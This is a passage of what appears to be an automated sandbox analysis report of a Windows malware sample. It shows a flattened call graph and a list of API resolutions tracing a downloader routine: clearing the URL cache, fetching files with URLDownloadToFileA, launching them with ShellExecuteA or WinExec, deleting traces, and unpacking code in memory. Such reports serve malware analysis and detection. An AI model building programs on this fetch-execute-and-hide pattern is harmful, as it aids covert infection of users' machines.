4 API calls 6117->6120 6119 407708 SetFileAttributesA 6118->6119 6121 404f2c 18 API calls 6119->6121 6122 407304 6120->6122 6123 407716 6121->6123 6125 402560 4 API calls 6122->6125 6124 403b5c 17 API calls 6123->6124 6126 407723 6124->6126 6127 407309 6125->6127 6131 404af8 20 API calls 6126->6131 6128 403ed8 4 API calls 6127->6128 6129 407318 6128->6129 6130 4030f4 4 API calls 6129->6130 6132 40731d 6130->6132 6133 407742 6131->6133 6134 402560 4 API calls 6132->6134 6136 4039f4 17 API calls 6133->6136 6135 407322 6134->6135 6137 402ba8 4 API calls 6135->6137 6138 40775c 6136->6138 6139 40732c 6137->6139 6140 402560 4 API calls 6139->6140 6141 407331 6140->6141 6142 404f2c 18 API calls 6141->6142 6143 407339 6142->6143 6144 403b5c 17 API calls 6143->6144 6145 407346 6144->6145 6146 4027d4 4 API calls 6145->6146 6147 40735d 6146->6147 6148 402560 4 API calls 6147->6148 6149 407362 6148->6149 6150 403ed8 4 API calls 6149->6150 6151 407371 6150->6151 6152 4030f4 4 API calls 6151->6152 6153 407376 6152->6153 6154 402560 4 API calls 6153->6154 6155 40737b 6154->6155 6156 403ed8 4 API calls 6155->6156 6157 40738a 6156->6157 6158 4030f4 4 API calls 6157->6158 6159 40738f 6158->6159 6160 402560 4 API calls 6159->6160 6161 407394 6160->6161 6162 402ba8 4 API calls 6161->6162 6163 40739e 6162->6163 6164 402560 4 API calls 6163->6164 6165 4073a3 Sleep 6164->6165 6166 404f2c 18 API calls 6165->6166 6167 4073be 6166->6167 6168 403c14 17 API calls 6167->6168 6169 4073d3 6168->6169 6170 4073db 15 API calls 6169->6170 6171 407549 6170->6171 6172 40753a SendMessageA 6170->6172 6173 404854 39 API calls 6171->6173 6172->6171 6174 407553 6173->6174 6175 404854 39 API calls 6174->6175 6176 40755d 6175->6176 6177 404854 39 API calls 6176->6177 6178 407567 6177->6178 6179 404854 39 API calls 6178->6179 6180 407571 6179->6180 6181 404854 39 API calls 6180->6181 6182 40757b 6181->6182 6183 404854 39 API calls 6182->6183 6184 407585 6183->6184 6185 404854 39 API calls 6184->6185 6186 40758f 6185->6186 6187 404854 39 API calls 6186->6187 6188 407599 6187->6188 6189 404854 39 API calls 6188->6189 6190 4075a3 6189->6190 6191 404854 39 API calls 6190->6191 6192 4075ad 6191->6192 6193 404854 39 API calls 6192->6193 6194 4075b7 6193->6194 6195 404854 39 API calls 6194->6195 6196 4075c1 6195->6196 6197 404854 39 API calls 6196->6197 6198 4075cb 6197->6198 6199 404854 39 API calls 6198->6199 6200 4075d5 6199->6200 6201 404854 39 API calls 6200->6201 6202 4075df 6201->6202 6203 404854 39 API calls 6202->6203 6204 4075e9 6203->6204 6205 404854 39 API calls 6204->6205 6206 4075f3 6205->6206 6207 404854 39 API calls 6206->6207 6208 4075fd 6207->6208 6209 404854 39 API calls 6208->6209 6210 407607 6209->6210 6211 404854 39 API calls 6210->6211 6212 407611 6211->6212 6213 404854 39 API calls 6212->6213 6214 40761b 6213->6214 6215 404854 39 API calls 6214->6215 6216 407625 6215->6216 6217 404854 39 API calls 6216->6217 6218 40762f 6217->6218 6219 404854 39 API calls 6218->6219 6220 407639 6219->6220 6221 404854 39 API calls 6220->6221 6222 407643 6221->6222 6223 404854 39 API calls 6222->6223 6224 40764d 6223->6224 6225 404854 39 API calls 6224->6225 6226 407657 6225->6226 6227 404854 39 API calls 6226->6227 6228 407661 6227->6228 6229 404f2c 18 API calls 6228->6229 6230 40766b 6229->6230 6231 403b5c 17 API calls 6230->6231 6232 407678 6231->6232 6233 407680 SetFileAttributesA 6232->6233 6234 404f2c 18 API calls 6233->6234 6235 40768e 6234->6235 6236 403b5c 17 API calls 6235->6236 6237 40769b 6236->6237 6238 404af8 20 API calls 6237->6238 6239 4076ba 6238->6239 6240 404f2c 18 API calls 6239->6240 6241 4076c2 6240->6241 6242 403b5c 17 API calls 6241->6242 6243 4076cf 6242->6243 6244 4076d7 DeleteFileA 6243->6244 6244->6133 6246 4068e8 6245->6246 6247 4068ed 6245->6247 6249 406728 6246->6249 6247->6049 6277 404f84 GetSystemDirectoryA 6249->6277 6252 403b5c 17 API calls 6253 406757 6252->6253 6282 404cf4 6253->6282 6256 406824 6258 4039f4 17 API calls 6256->6258 6260 40683e 6258->6260 6259 40676c 6261 4067d7 6259->6261 6262 406788 6259->6262 6260->6247 6263 404dd0 17 API calls 6261->6263 6264 404dd0 17 API calls 6262->6264 6265 4067e8 6263->6265 6266 406799 6264->6266 6268 404dd0 17 API calls 6265->6268 6267 404dd0 17 API calls 6266->6267 6269 4067af 6267->6269 6270 4067fe 6268->6270 6272 404dd0 17 API calls 6269->6272 6271 404dd0 17 API calls 6270->6271 6273 406814 6271->6273 6274 4067c5 6272->6274 6275 40681c ShellExecuteA 6273->6275 6276 4067cd ShellExecuteA 6274->6276 6275->6256 6276->6256 6278 403b3c 17 API calls 6277->6278 6280 404faa 6278->6280 6279 404fc6 6279->6252 6280->6279 6281 403b5c 17 API calls 6280->6281 6281->6279 6286 404c8c 6282->6286 6285 402728 GetSystemTime 6285->6259 6287 403d4c 6286->6287 6288 404ca6 FindFirstFileA 6287->6288 6289 404cb1 FindClose 6288->6289 6290 404ce5 6288->6290 6289->6290 6291 404cc0 FileTimeToLocalFileTime FileTimeToDosDateTime 6289->6291 6290->6256 6290->6285 6291->6290 6293 406720 6292->6293 6294 406725 6292->6294 6296 4066f8 6293->6296 6294->6065 6303 4055d8 6296->6303 6304 4055e0 6303->6304 6304->6304 6305 4039d0 17 API calls 6304->6305 6306 4055ff 6305->6306 6307 404dd0 17 API calls 6306->6307 6308 40560c 6307->6308 6309 403b00 17 API calls 6308->6309 6310 405620 6309->6310 6311 404f2c 18 API calls 6310->6311 6312 405628 6311->6312 6313 404dd0 17 API calls 6312->6313 6314 405636 6313->6314 6315 403b5c 17 API calls 6314->6315 6316 40563e 6315->6316 6317 403b00 17 API calls 6316->6317 6318 405656 6317->6318 6319 405662 DeleteUrlCacheEntry 6318->6319 6320 403d4c 6319->6320 6321 405674 DeleteFileA 6320->6321 6322 40568a 6321->6322 6323 405697 URLDownloadToFileA 6322->6323 6324 4056a3 Sleep 6323->6324 6325 4056ad 6323->6325 6324->6325 6326 404cf4 4 API calls 6325->6326 6327 4056b9 6326->6327 6328 4056c1 6327->6328 6329 405859 6327->6329 6558 4027bc 6328->6558 6330 4039f4 17 API calls 6329->6330 6331 405873 6330->6331 6385 4058d0 6331->6385 6340 402560 4 API calls 6341 405701 6340->6341 6577 402ba8 6341->6577 6344 402560 4 API calls 6345 405710 6344->6345 6346 404f2c 18 API calls 6345->6346 6347 40571c 6346->6347 6348 405018 17 API calls 6347->6348 6349 40572f 6348->6349 6350 403b5c 17 API calls 6349->6350 6351 405738 6350->6351 6352 40574d URLDownloadToFileA 6351->6352 6353 405763 6352->6353 6354 405759 Sleep 6352->6354 6355 404f2c 18 API calls 6353->6355 6354->6353 6356 40576b 6355->6356 6357 405018 17 API calls 6356->6357 6358 40577e 6357->6358 6359 403b5c 17 API calls 6358->6359 6360 405787 6359->6360 6361 404cf4 4 API calls 6360->6361 6362 40578f 6361->6362 6362->6329 6363 404f2c 18 API calls 6362->6363 6364 4057a5 6363->6364 6365 405018 17 API calls 6364->6365 6366 4057b8 6365->6366 6367 403b5c 17 API calls 6366->6367 6368 4057c1 6367->6368 6369 404dd0 17 API calls 6368->6369 6370 4057d7 6369->6370 6371 4057df ShellExecuteA Sleep 6370->6371 6372 403d4c 6371->6372 6373 4057fd DeleteFileA 6372->6373 6374 403d4c 6373->6374 6375 40580f DeleteUrlCacheEntry 6374->6375 6376 403d4c 6375->6376 6377 405821 DeleteUrlCacheEntry 6376->6377 6378 404f2c 18 API calls 6377->6378 6379 40582f 6378->6379 6380 405018 17 API calls 6379->6380 6381 405842 6380->6381 6382 403b5c 17 API calls 6381->6382 6383 40584b 6382->6383 6384 405853 DeleteFileA 6383->6384 6384->6329 6386 4058d8 6385->6386 6386->6386 6387 4039d0 17 API calls 6386->6387 6388 4058f7 6387->6388 6389 404dd0 17 API calls 6388->6389 6390 405907 6389->6390 6391 403b00 17 API calls 6390->6391 6392 40591e 6391->6392 6393 404f2c 18 API calls 6392->6393 6394 405929 6393->6394 6395 404dd0 17 API calls 6394->6395 6396 405940 6395->6396 6397 403b5c 17 API calls 6396->6397 6398 40594c 6397->6398 6399 403b00 17 API calls 6398->6399 6400 405963 6399->6400 6401 40596f DeleteUrlCacheEntry 6400->6401 6402 403d4c 6401->6402 6403 405981 DeleteFileA 6402->6403 6404 405997 6403->6404 6405 4059a4 URLDownloadToFileA 6404->6405 6406 4059b0 Sleep 6405->6406 6407 4059ba 6405->6407 6406->6407 6408 404cf4 4 API calls 6407->6408 6410 4059c6 6408->6410 6409 405c65 6411 4039f4 17 API calls 6409->6411 6410->6409 6412 4027bc 4 API calls 6410->6412 6413 405c82 6411->6413 6414 4059ea 6412->6414 6415 4039d0 17 API calls 6413->6415 6416 402560 4 API calls 6414->6416 6417 405c8a 6415->6417 6418 4059ef 6416->6418 6507 405d7c 6417->6507 6419 402dec 17 API calls 6418->6419 6420 4059ff 6419->6420 6421 402e58 4 API calls 6420->6421 6422 405a09 6421->6422 6423 402560 4 API calls 6422->6423 6424 405a0e 6423->6424 6425 402ba8 4 API calls 6424->6425 6426 405a18 6425->6426 6427 402560 4 API calls 6426->6427 6428 405a1d GetEnvironmentVariableA SHGetSpecialFolderLocation SHGetPathFromIDList 6427->6428 6429 403b3c 17 API calls 6428->6429 6430 405a63 6429->6430 6431 404dd0 17 API calls 6430->6431 6432 405a73 6431->6432 6596 403ba0 6432->6596 6434 405a87 6611 4027c8 6434->6611 6437 402560 4 API calls 6438 405aad 6437->6438 6439 404dd0 17 API calls 6438->6439 6440 405abd 6439->6440 6614 403ed8 6440->6614 6508 4039d0 17 API calls 6507->6508 6509 405d9e 6508->6509 6510 404dd0 17 API calls 6509->6510 6511 405dab 6510->6511 6512 403b00 17 API calls 6511->6512 6513 405dbf 6512->6513 6514 404f2c 18 API calls 6513->6514 6515 405dc7 6514->6515 6516 404dd0 17 API calls 6515->6516 6517 405dd8 6516->6517 6518 403b5c 17 API calls 6517->6518 6519 405de1 6518->6519 6520 403b00 17 API calls 6519->6520 6521 405df5 6520->6521 6522 405e01 DeleteUrlCacheEntry 6521->6522 6523 403d4c 6522->6523 6524 405e13 DeleteFileA 6523->6524 6525 405e29 6524->6525 6526 405e36 URLDownloadToFileA 6525->6526 6527 405e42 Sleep 6526->6527 6528 405e4c 6526->6528 6527->6528 6529 404cf4 4 API calls 6528->6529 6530 405e58 6529->6530 6531 405e60 6530->6531 6532 405f21 6530->6532 6535 4027bc 4 API calls 6531->6535 6533 4039f4 17 API calls 6532->6533 6534 405f3b 6533->6534 6534->6294 6536 405e7c 6535->6536 6537 402560 4 API calls 6536->6537 6538 405e81 6537->6538 6539 402dec 17 API calls 6538->6539 6540 405e91 6539->6540 6541 402e58 4 API calls 6540->6541 6542 405e9b 6541->6542 6543 402560 4 API calls 6542->6543 6544 405ea0 6543->6544 6545 402ba8 4 API calls 6544->6545 6546 405eaa 6545->6546 6547 402560 4 API calls 6546->6547 6548 405eaf 6547->6548 6549 404dd0 17 API calls 6548->6549 6550 405ecd 6549->6550 6551 404dd0 17 API calls 6550->6551 6552 405ee3 6551->6552 6553 405eeb ShellExecuteA Sleep 6552->6553 6554 403d4c 6553->6554 6555 405f09 DeleteFileA 6554->6555 6556 403d4c 6555->6556 6557 405f1b DeleteUrlCacheEntry 6556->6557 6557->6532 6584 402764 6558->6584 6561 402560 6562 404164 4 API calls 6561->6562 6563 402568 6562->6563 6564 402dec 6563->6564 6565 4039d0 17 API calls 6564->6565 6566 402df9 6565->6566 6590 402de0 6566->6590 6568 402e4d 6573 402e58 6568->6573 6569 402de0 4 API calls 6571 402e0d 6569->6571 6570 403b5c 17 API calls 6570->6571 6571->6568 6571->6569 6571->6570 6572 4039d0 17 API calls 6571->6572 6572->6571 6576 402e5b 6573->6576 6574 402d00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6574->6576 6575 402e84 6575->6340 6576->6574 6576->6575 6578 402be7 6577->6578 6579 402bb8 6577->6579 6580 402be5 6578->6580 6581 402580 4 API calls 6578->6581 6579->6578 6582 402bbe 6579->6582 6580->6344 6581->6580 6582->6580 6593 402580 6582->6593 6585 402774 6584->6585 6586 40277a 6584->6586 6585->6586 6589 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6585->6589 6587 4027b7 6586->6587 6588 402580 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6586->6588 6587->6561 6588->6587 6589->6586 6591 402d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6590->6591 6592 402de7 6591->6592 6592->6571 6594 404164 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6593->6594 6595 402588 6594->6595 6595->6580 6597 403ba4 6596->6597 6598 403c05 6596->6598 6599 403a24 6597->6599 6600 403bac 6597->6600 6604 403a94 17 API calls 6599->6604 6606 403a38 6599->6606 6600->6598 6602 403bbb 6600->6602 6605 403a24 17 API calls 6600->6605 6601 403a66 6601->6434 6603 403a94 17 API calls 6602->6603 6608 403bd5 6603->6608 6604->6606 6605->6602 6606->6601 6607 40248c 17 API calls 6606->6607 6607->6601 6609 403a24 17 API calls 6608->6609 6610 403c01 6609->6610 6610->6434 6612 402764 4 API calls 6611->6612 6613 4027d1 6612->6613 6613->6437 6630 403ee0 6614->6630 6631 403eeb 6630->6631 6632 403078 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6631->6632 6633 403ef6 6632->6633 6644->5758 6645->5760 6646->5762 6647->5771 6654 408183 6653->6654 6656 4080eb 6653->6656 6655 4039f4 17 API calls 6654->6655 6657 40819d 6655->6657 6656->6654 6658 40810e DeleteUrlCacheEntry 6656->6658 6671 4081e8 6657->6671 6659 404f2c 18 API calls 6658->6659 6660 40811c 6659->6660 6661 403b5c 17 API calls 6660->6661 6662 408129 6661->6662 6663 408131 DeleteFileA 6662->6663 6664 404f2c 18 API calls 6663->6664 6665 408143 6664->6665 6666 403b5c 17 API calls 6665->6666 6667 408150 6666->6667 6668 408165 URLDownloadToFileA 6667->6668 6668->6654 6669 408171 6668->6669 6670 40817d DeleteUrlCacheEntry 6669->6670 6670->6654 6672 4083a8 6671->6672 6675 40820e 6671->6675 6673 4039f4 17 API calls 6672->6673 6674 4083c2 6673->6674 6674->5805 6675->6672 6676 408231 DeleteUrlCacheEntry 6675->6676 6677 404f2c 18 API calls 6676->6677 6678 40823f 6677->6678 6679 403b5c 17 API calls 6678->6679 6680 40824c 6679->6680 6681 408254 DeleteFileA 6680->6681 6682 404f2c 18 API calls 6681->6682 6683 408266 6682->6683 6684 403b5c 17 API calls 6683->6684 6685 408273 6684->6685 6686 408288 URLDownloadToFileA 6685->6686 6687 408294 Sleep 6686->6687 6688 40829e 6686->6688 6687->6688 6689 404f2c 18 API calls 6688->6689 6690 4082a6 6689->6690 6691 403b5c 17 API calls 6690->6691 6692 4082b3 6691->6692 6693 404cf4 4 API calls 6692->6693 6694 4082bb 6693->6694 6694->6672 6695 404f2c 18 API calls 6694->6695 6696 4082cb 6695->6696 6697 403b5c 17 API calls 6696->6697 6698 4082d8 6697->6698 6699 4027bc 4 API calls 6698->6699 6700 4082ef 6699->6700 6701 402560 4 API calls 6700->6701 6702 4082f4 6701->6702 6703 402dec 17 API calls 6702->6703 6704 408304 6703->6704 6705 402e58 4 API calls 6704->6705 6706 40830e 6705->6706 6707 402560 4 API calls 6706->6707 6708 408313 6707->6708 6709 402ba8 4 API calls 6708->6709 6710 40831d 6709->6710 6711 402560 4 API calls 6710->6711 6712 408322 6711->6712 6713 404af8 20 API calls 6712->6713 6714 408345 6713->6714 6715 408373 6714->6715 6716 408358 6714->6716 6718 40837f DeleteUrlCacheEntry 6715->6718 6717 404af8 20 API calls 6716->6717 6717->6715 6719 404f2c 18 API calls 6718->6719 6720 40838d 6719->6720 6721 403b5c 17 API calls 6720->6721 6722 40839a 6721->6722 6723 4083a2 DeleteFileA 6722->6723 6723->6672 6725 403a94 17 API calls 6724->6725 6726 403ad0 6725->6726 6727 4039d0 17 API calls 6726->6727 6728 403ae8 6727->6728 6728->5528 6728->5529 6730 402f9e 6729->6730 6765 402eb0 6730->6765 6734 402c76 6733->6734 6735 402c4d 6733->6735 6737 402580 4 API calls 6734->6737 6735->6734 6736 402c53 GetFileSize 6735->6736 6738 402c64 6736->6738 6739 402c69 6736->6739 6737->6739 6778 402590 GetLastError 6738->6778 6739->5544 6742 402fd5 6741->6742 6743 402fbc SetFilePointer 6741->6743 6744 402590 GetLastError 6743->6744 6745 402fd4 6743->6745 6746 402580 4 API calls 6744->6746 6745->5547 6747 40259a 6746->6747 6747->5547 6781 402afc 6748->6781 6752 404d57 6751->6752 6753 404d70 6752->6753 6754 404d79 6752->6754 6755 4039d0 17 API calls 6753->6755 6756 403da4 17 API calls 6754->6756 6757 404d77 6755->6757 6756->6757 6758 403da4 6757->6758 6759 403dd6 6758->6759 6761 403da9 6758->6761 6760 4039d0 17 API calls 6759->6760 6764 403dcc 6760->6764 6761->6759 6762 403dbd 6761->6762 6763 403ac0 17 API calls 6762->6763 6763->6764 6764->5572 6766 402edc 6765->6766 6767 402ec7 6765->6767 6769 402ef9 CreateFileA 6766->6769 6771 402f59 GetStdHandle 6766->6771 6767->6766 6768 402f72 6767->6768 6777 402580 4 API calls 6767->6777 6772 402580 4 API calls 6768->6772 6773 402f50 6769->6773 6771->6773 6775 402f55 6772->6775 6773->6775 6776 402f79 GetLastError 6773->6776 6775->5540 6776->6768 6777->6766 6779 402580 4 API calls 6778->6779 6780 40259a 6779->6780 6780->6739 6782 402b16 ReadFile 6781->6782 6783 402b6e 6781->6783 6784 402b2d GetLastError 6782->6784 6785 402b3e 6782->6785 6786 402580 4 API calls 6783->6786 6787 402580 4 API calls 6784->6787 6788 402b37 6785->6788 6789 402580 4 API calls 6785->6789 6786->6788 6787->6788 6788->5552 6789->6788 6790->5624 6792 405135 6791->6792 6793 403b3c 17 API calls 6791->6793 6802 4026c8 6792->6802 6793->6792 6796 403c14 17 API calls 6797 405168 6796->6797 6798 405173 WinExec 6797->6798 6799 405186 6798->6799 6800 4039f4 17 API calls 6799->6800 6801 405196 6800->6801 6801->5494 6803 4039d0 17 API calls 6802->6803 6804 4026dc 6803->6804 6805 4026e0 GetModuleFileNameA 6804->6805 6806 4026fe GetCommandLineA 6804->6806 6807 403ac0 17 API calls 6805->6807 6810 402705 6806->6810 6809 4026fc 6807->6809 6809->6796 6810->6809 6811 4025dc 6810->6811 6812 4025ee 6811->6812 6813 4025e6 CharNextA 6812->6813 6818 402608 6812->6818 6813->6812 6814 402657 6817 403e74 17 API calls 6814->6817 6815 402612 CharNextA 6815->6818 6816 402643 CharNextA 6816->6818 6824 402660 6817->6824 6818->6814 6818->6815 6818->6816 6819 40261c CharNextA 6818->6819 6820 402639 CharNextA 6818->6820 6819->6818 6820->6818 6821 4026bf 6821->6810 6822 4026a4 CharNextA 6822->6824 6823 40266c CharNextA 6823->6824 6824->6821 6824->6822 6824->6823 6825 402676 CharNextA 6824->6825 6826 40269a CharNextA 6824->6826 6825->6824 6826->6824 7014 40285c CloseHandle 7106 40286c 7111 40285c CloseHandle 7106->7111 7108 40287c 7109 402880 GetLastError 7108->7109 7110 402887 7108->7110 7111->7108 6997 4381fa 6999 438214 6997->6999 6998 43851d 6999->6998 7000 438231 VirtualAlloc 6999->7000 7000->6998 7001 438273 7000->7001 7003 43827e 7001->7003 7004 438294 7003->7004 7006 43834b 7004->7006 7007 43835e VirtualFree 7006->7007 7010 438408 7007->7010 7009 438524 LoadLibraryA 7013 43844c 7009->7013 7010->7009 7011 438518 7012 4384f9 VirtualProtect 7012->7011 7012->7012 7013->7011 7013->7012 7015 4024fc 7018 4039b8 7015->7018 7021 4038e0 7018->7021 7023 4038f9 7021->7023 7022 403922 7038 4036c8 7022->7038 7023->7022 7031 403854 7023->7031 7026 40393e 7027 403964 FreeLibrary 7026->7027 7028 40396a 7026->7028 7027->7028 7029 40399f 7028->7029 7030 403997 ExitProcess 7028->7030 7032 4038b5 7031->7032 7033 40385e 7031->7033 7035 4038d1 7032->7035 7036 4038be MessageBoxA 7032->7036 7034 40387d GetStdHandle WriteFile GetStdHandle WriteFile 7033->7034 7037 403872 7033->7037 7034->7022 7035->7022 7036->7035 7037->7034 7039 403704 7038->7039 7040 4036da 7038->7040 7039->7026 7040->7039 7043 404022 7040->7043 7053 404024 7040->7053 7044 404024 7043->7044 7045 404060 7044->7045 7046 402ba8 4 API calls 7044->7046 7045->7040 7047 404047 7046->7047 7048 402ba8 4 API calls 7047->7048 7049 404051 7048->7049 7050 402ba8 4 API calls 7049->7050 7051 40405b 7050->7051 7063 40187c 7051->7063 7054 404060 7053->7054 7055 40403d 7053->7055 7054->7040 7056 402ba8 4 API calls 7055->7056 7057 404047 7056->7057 7058 402ba8 4 API calls 7057->7058 7059 404051 7058->7059 7060 402ba8 4 API calls 7059->7060 7061 40405b 7060->7061 7062 40187c 6 API calls 7061->7062 7062->7054 7064 401959 7063->7064 7065 40188d 7063->7065 7064->7045 7066 4018a4 RtlEnterCriticalSection 7065->7066 7067 4018ae LocalFree 7065->7067 7066->7067 7068 4018e1 7067->7068 7069 4018cf VirtualFree 7068->7069 7070 4018e9 7068->7070 7069->7068 7071 401910 LocalFree 7070->7071 7072 401927 7070->7072 7071->7071 7071->7072 7073 401947 RtlDeleteCriticalSection 7072->7073 7074 40193d RtlLeaveCriticalSection 7072->7074 7073->7045 7074->7073 7504 402e86 7509 40285c CloseHandle 7504->7509 7506 402ea4 7507 402e9b 7507->7506 7508 402590 5 API calls 7507->7508 7508->7506 7509->7507 7075 40288c 7076 4028a2 7075->7076 7077 402904 CreateFileA 7076->7077 7078 4029b6 GetStdHandle 7076->7078 7089 4028a8 7076->7089 7079 402922 7077->7079 7080 402a2a GetLastError 7077->7080 7078->7080 7083 4029f1 7078->7083 7082 402930 GetFileSize 7079->7082 7079->7083 7080->7089 7082->7080 7084 402944 7082->7084 7085 4029fb GetFileType 7083->7085 7083->7089 7086 40294b 7084->7086 7087 40294d SetFilePointer 7084->7087 7088 402a16 CloseHandle 7085->7088 7085->7089 7086->7087 7087->7080 7090 402960 ReadFile 7087->7090 7088->7089 7090->7080 7091 402982 7090->7091 7091->7083 7092 402995 SetFilePointer 7091->7092 7092->7080 7093 4029aa SetEndOfFile 7092->7093 7093->7080 7094 4029b4 7093->7094 7094->7083 7141 404412 7142 404414 CreateWindowExA 7141->7142 6981 404a98 6982 404ab1 NtdllDefWindowProc_A 6981->6982 6983 404aa8 PostQuitMessage 6981->6983 6984 404ac5 6982->6984 6983->6984 7513 401ea5 7514 401ebd 7513->7514 7515 401eb8 7513->7515 7517 401eea RtlEnterCriticalSection 7514->7517 7518 401ef4 7514->7518 7521 401ec9 7514->7521 7516 4017b8 4 API calls 7515->7516 7516->7514 7517->7518 7518->7521 7524 401db0 7518->7524 7522 402015 RtlLeaveCriticalSection 7523 40201f 7522->7523 7527 401dc0 7524->7527 7525 401dec 7526 401bc4 9 API calls 7525->7526 7529 401e10 7525->7529 7526->7529 7527->7525 7528 401d24 12 API calls 7527->7528 7527->7529 7528->7527 7529->7522 7529->7523 5301 401db0 5304 401dc0 5301->5304 5302 401dec 5306 401e10 5302->5306 5312 401bc4 5302->5312 5304->5302 5304->5306 5307 401d24 5304->5307 5316 401578 5307->5316 5309 401d34 5310 401d41 5309->5310 5325 401c98 5309->5325 5310->5304 5313 401be2 5312->5313 5314 401c19 5312->5314 5313->5306 5314->5313 5391 401b14 5314->5391 5319 401594 5316->5319 5318 40159e 5332 401464 5318->5332 5319->5318 5322 4015ef 5319->5322 5324 4015aa 5319->5324 5336 4012d0 5319->5336 5344 4011cc 5319->5344 5348 4013ac 5322->5348 5324->5309 5358 401c4c 5325->5358 5328 4011cc LocalAlloc 5329 401cbc 5328->5329 5331 401cc4 5329->5331 5362 4019f0 5329->5362 5331->5310 5333 4014aa 5332->5333 5334 4014c6 VirtualAlloc 5333->5334 5335 4014da 5333->5335 5334->5333 5334->5335 5335->5324 5337 4012df VirtualAlloc 5336->5337 5339 40130c 5337->5339 5340 40132f 5337->5340 5352 401184 5339->5352 5340->5319 5343 40131c VirtualFree 5343->5340 5345 4011e8 5344->5345 5346 401184 LocalAlloc 5345->5346 5347 40122f 5346->5347 5347->5319 5351 4013db 5348->5351 5349 401434 5349->5324 5350 401408 VirtualFree 5350->5351 5351->5349 5351->5350 5355 40112c 5352->5355 5354 40118f 5354->5340 5354->5343 5356 401138 LocalAlloc 5355->5356 5357 40114a 5355->5357 5356->5357 5357->5354 5357->5357 5359 401c5e 5358->5359 5360 401c55 5358->5360 5359->5328 5360->5359 5367 401a20 5360->5367 5363 401a0d 5362->5363 5364 4019fe 5362->5364 5363->5331 5365 401bc4 9 API calls 5364->5365 5366 401a0b 5365->5366 5366->5331 5370 402034 5367->5370 5369 401a41 5369->5359 5371 402052 5370->5371 5372 40204d 5370->5372 5374 402083 RtlEnterCriticalSection 5371->5374 5377 40208d 5371->5377 5378 402056 5371->5378 5384 4017b8 RtlInitializeCriticalSection 5372->5384 5374->5377 5375 402099 5379 4021c5 5375->5379 5380 4021bb RtlLeaveCriticalSection 5375->5380 5376 40211c 5376->5378 5381 401c4c 7 API calls 5376->5381 5377->5375 5377->5376 5382 402148 5377->5382 5378->5369 5379->5369 5380->5379 5381->5378 5382->5375 5383 401bc4 7 API calls 5382->5383 5383->5375 5385 4017e6 5384->5385 5386 4017dc RtlEnterCriticalSection 5384->5386 5387 401804 LocalAlloc 5385->5387 5386->5385 5388 40181e 5387->5388 5389 401863 RtlLeaveCriticalSection 5388->5389 5390 40186d 5388->5390 5389->5390 5390->5371 5392 401b2a 5391->5392 5393 401b55 5392->5393 5394 401b69 5392->5394 5403 401bb2 5392->5403 5404 40172c 5393->5404 5396 40172c 3 API calls 5394->5396 5397 401b67 5396->5397 5398 4019f0 9 API calls 5397->5398 5397->5403 5400 401b8d 5398->5400 5399 401ba7 5419 401240 5399->5419 5400->5399 5414 401a44 5400->5414 5403->5313 5405 401752 5404->5405 5413 4017ab 5404->5413 5423 4014f8 5405->5423 5408 4011cc LocalAlloc 5409 40176f 5408->5409 5410 401786 5409->5410 5411 4013ac VirtualFree 5409->5411 5412 401240 LocalAlloc 5410->5412 5410->5413 5411->5410 5412->5413 5413->5397 5415 401a57 5414->5415 5416 401a49 5414->5416 5415->5399 5417 401a20 9 API calls 5416->5417 5418 401a56 5417->5418 5418->5399 5421 40124b 5419->5421 5420 401266 5420->5403 5421->5420 5422 401184 LocalAlloc 5421->5422 5422->5420 5425 40152f 5423->5425 5424 40156f 5424->5408 5425->5424 5426 401549 VirtualFree 5425->5426 5426->5425 7162 439c35 7163 439c47 7162->7163 7166 439c54 7163->7166 7167 439c79 7166->7167 7170 439cc7 7167->7170 7171 439ced 7170->7171 7172 439d06 VirtualAlloc 7171->7172 7173 439d2a LoadLibraryA 7172->7173

                                                                            Executed Functions

                                                                            Function 02311BC1 Relevance: 131.8, APIs: 68, Strings: 7, Instructions: 507libraryloaderthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 023118A1: GetVersionExA.KERNEL32(?), ref: 023118BB
                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 02311BE9
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CD0
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CDE
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CEC
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CFA
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D08
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D16
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D24
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D32
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D40
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D4E
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D5C
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D6A
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D78
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D86
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D94
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DA2
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DB0
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DBE
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DCC
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DDA
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DE8
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DF6
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E04
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E12
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E20
                                                                            • LoadLibraryA.KERNEL32(Wininet.dll), ref: 02311E32
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311E48
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E58
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E68
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E78
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E88
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E98
                                                                            • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 02311EA4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EB5
